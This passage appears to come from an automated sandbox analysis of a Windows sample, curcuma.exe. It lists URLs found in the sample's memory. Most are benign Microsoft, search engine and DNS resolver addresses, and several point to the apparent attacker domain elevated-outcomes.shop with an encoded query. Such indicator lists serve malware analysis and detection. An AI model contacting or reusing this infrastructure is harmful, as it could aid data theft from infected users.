Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
Source: curcuma.exe, 00000025.00000003.1918109552.0000012CDEE91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://a.nel.cloudflare.com/report/v3?s=0b6Aifh30%2FgfQaQCMOwZ14uQEQ53jYrfzrDCc10FuTOoqrvbxYTjZLXhH
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: curcuma.exe, 00000025.00000003.1817922723.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingcsp
Source: curcuma.exe, 00000025.00000003.1817922723.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZEY
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZEpr
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFpk
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://alekberg.net/privacy
Source: curcuma.exe, 00000025.00000003.1788725872.0000012CE2C43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selection?placement=88000369&nct=1&fmt=json&ADEFAB=1&OPSYS=WIN10&locale=e
Source: curcuma.exe, 00000025.00000003.1879404663.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/channel-data-connector.0818c0a6f8b76d93738b.js
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.js
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/experience.712fce86a817d16b2c92.jspr
Source: curcuma.exe, 00000025.00000003.1866305004.0000012CDEE2A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_experiences-telemetry_dist_object-mapping
Source: curcuma.exe, 00000025.00000003.1853897359.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_sports-data-service_dist_SportsDataMapper
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.js
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/bundles/v1/edgeChromium/latest/vendors.5d0f28115e15fcff20c5.jspr
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEEDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype
Source: curcuma.exe, 00000025.00000003.1855299077.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/service/news/feed/pages/weblayout?User=m-0DDB686F4DAE69E20AF07DC74C2A6898&act
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-query
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryhttps://deff.nelreports.net/api/reportcat=msn.
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryrp
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryrpP
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.cloudflare-dns.com/dns-queryrpPL
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.dns.nextdns.io
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cleanbrowsing.org/privacy
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1817922723.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1830154436.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnpr
Source: curcuma.exe, 00000025.00000003.1817922723.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1830154436.0000012CE2C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/reportcat=msn.
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations/
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations/
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/cert_verifier.mojom.URLLoaderF
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.google/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net/dns-query
Source: curcuma.exe, 00000025.00000003.1803001945.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.quad9.net/dns-query.png
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.sb/privacy/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.switch.ch/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns.switch.ch/dns-queryhttps://dns.quad9.net/dns-queryhttps://chromium.dns.nextdns.iohttps:/
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns10.quad9.net/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns11.quad9.net/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dns64.dns.google/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dnsnl.alekberg.net/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh-01.spectrum.com/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh-02.spectrum.com/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.cox.net/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.dns.sb/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.opendns.com/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.quickline.ch/dns-query
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://doh.xfinity.com/dns-query
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
Source: curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: curcuma.exe, 00000025.00000003.1740198504.0000012CDEEDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://edge.activity.windows.com
Source: curcuma.exe, 00000025.00000003.2010925300.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1924228697.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1928289376.0000012CDEF6A000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051276988.0000012CDD305000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1604701641.0000012CDD305000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2058633835.0000012CDD306000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD303000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD32F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2023877190.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000002.2061133250.0000012CDEF6C000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616351848.0000012CDD32F000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1985111422.0000012CDEF6E000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2009898152.0000012CDD303000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1924422209.0000012CDD2FD000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD305000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1960385639.0000012CDD305000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1985688441.0000012CDD305000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1973414830.0000012CDD305000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/
Source: curcuma.exe, 00000025.00000003.1961312143.0000012CDEE52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3Mw
Source: curcuma.exe, 00000025.00000003.1737873999.0000012CDEE52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV88cN
Source: curcuma.exe, 00000025.00000003.1961312143.0000012CDEE52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/NTIyOTQ3MwP55
Source: curcuma.exe, 00000025.00000002.2058966823.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2051938064.0000012CDD39B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop/rue
Source: curcuma.exe, 00000025.00000003.1616351848.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1616886676.0000012CDD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop:443
Source: curcuma.exe, 00000025.00000002.2061133250.0000012CDEF50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop:443/NTIyOTQ3Mw?ihaigqg=S77l%2BqQIqU5Z8Of519CEd47wpU8km8qz4lAsqKSDbJbV
Source: curcuma.exe, 00000025.00000003.1627781449.0000012CDD346000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1923866933.0000012CDD346000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://elevated-outcomes.shop:443l
Source: curcuma.exe, 00000025.00000003.1717845361.0000012CE2C1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEED1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://identity.nel.measure.office.net/api/report?catId=GW
Source: curcuma.exe, 00000025.00000003.1853897359.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA12rZ8k.img
Source: curcuma.exe, 00000025.00000003.1853897359.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA12rZ8k.img/service/msn/user?apikey=1hYoJsI
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1879404663.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA163BIW.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA163BIW.img?w=80&h=80&q=60&m=6&f=jpg&u=tpr
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA19HPwx.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1879404663.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1a8bzM.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1879404663.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1a8bzM.img?w=80&h=80&q=60&m=6&f=jpg&u=tpr
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1a8gmh.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1a8gmh.img?w=80&h=80&q=60&m=6&f=jpg&u=tpr
Source: curcuma.exe, 00000025.00000003.1853897359.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAdTRDX.img
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAufg2e.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAufg2e.img?w=80&h=80&q=60&m=6&f=jpg&u=tpr
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18CMuA.img?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA163TNa?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA163TNa?w=80&h=80&q=60&m=6&f=jpg&u=tlast-modified:Sat
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA19WLjq?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA19WLjq?w=80&h=80&q=60&m=6&f=jpg&u=tlast-modified:Wed
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA19Wcee?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA19Wcee?w=80&h=80&q=60&m=6&f=jpg&u=tx-source-length:11611
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1a28Ye?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1a28Ye?w=80&h=80&q=60&m=6&f=jpg&u=tx-source-length:97288
Source: curcuma.exe, 00000025.00000003.1841859255.0000012CDEEC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1xc9H0
Source: curcuma.exe, 00000025.00000003.1841859255.0000012CDEEC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AA1xc9H0Last-Modified:
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AANXkGJ?w=80&h=80&q=60&m=6&f=jpg&u=t
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AANXkGJ?w=80&h=80&q=60&m=6&f=jpg&u=tx-source-length:111502
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAdTRDX
Source: curcuma.exe, 00000025.00000003.1719954053.0000012CE2C16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
Source: curcuma.exe, 00000025.00000003.1708352966.0000012CDEE31000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1708352966.0000012CDEE27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
Source: curcuma.exe, 00000025.00000003.1708352966.0000012CDEE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
Source: curcuma.exe, 00000025.00000003.1708352966.0000012CDEE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/https://login.live.com/
Source: curcuma.exe, 00000025.00000003.1708352966.0000012CDEE31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
Source: curcuma.exe, 00000025.00000003.1879126698.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://m.adnxs.com/bounce?%2Fmapuid%3Fmember%3D280%26user%3D0DDB686F4DAE69E20AF07DC74C2A6898%3B%26g
Source: curcuma.exe, 00000025.00000003.1788725872.0000012CE2C43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://msn.com
Source: curcuma.exe, 00000025.00000003.1829413421.0000012CE2C6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nextdns.io/privacy
Source: curcuma.exe, 00000025.00000003.1791060166.0000012CE2C91000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1803251253.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853897359.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.2038350228.0000012CE2C00000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1803251253.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/
Source: curcuma.exe, 00000025.00000003.1803251253.0000012CE2C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/2
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.js
Source: curcuma.exe, 00000025.00000003.1803130341.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/bundles/v1/edgeChromium/latest/web-worker.948ffa5ea2d441a35f55.jspr
Source: curcuma.exe, 00000025.00000003.1891049553.0000012CE2C66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=288
Source: curcuma.exe, 00000025.00000003.1830154436.0000012CE2C67000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1853736172.0000012CE2C67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531&OCID=MNH
Source: curcuma.exe, 00000025.00000003.1891224117.0000012CDEEC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/om
Source: curcuma.exe, 00000025.00000003.1829527739.0000012CDEEC3000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1830154436.0000012CE2C67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.com/resolver/api/resolve/v3/config/?expType=AppConfig&expInstance=default&apptype=ed
Source: curcuma.exe, 00000025.00000003.1804074167.0000012CE2C91000.00000004.00000020.00020000.00000000.sdmp, curcuma.exe, 00000025.00000003.1791060166.0000012CE2C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comcache-control:public
Source: curcuma.exe, 00000025.00000003.1891540114.0000012CE2C43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ntp.msn.comreport-to
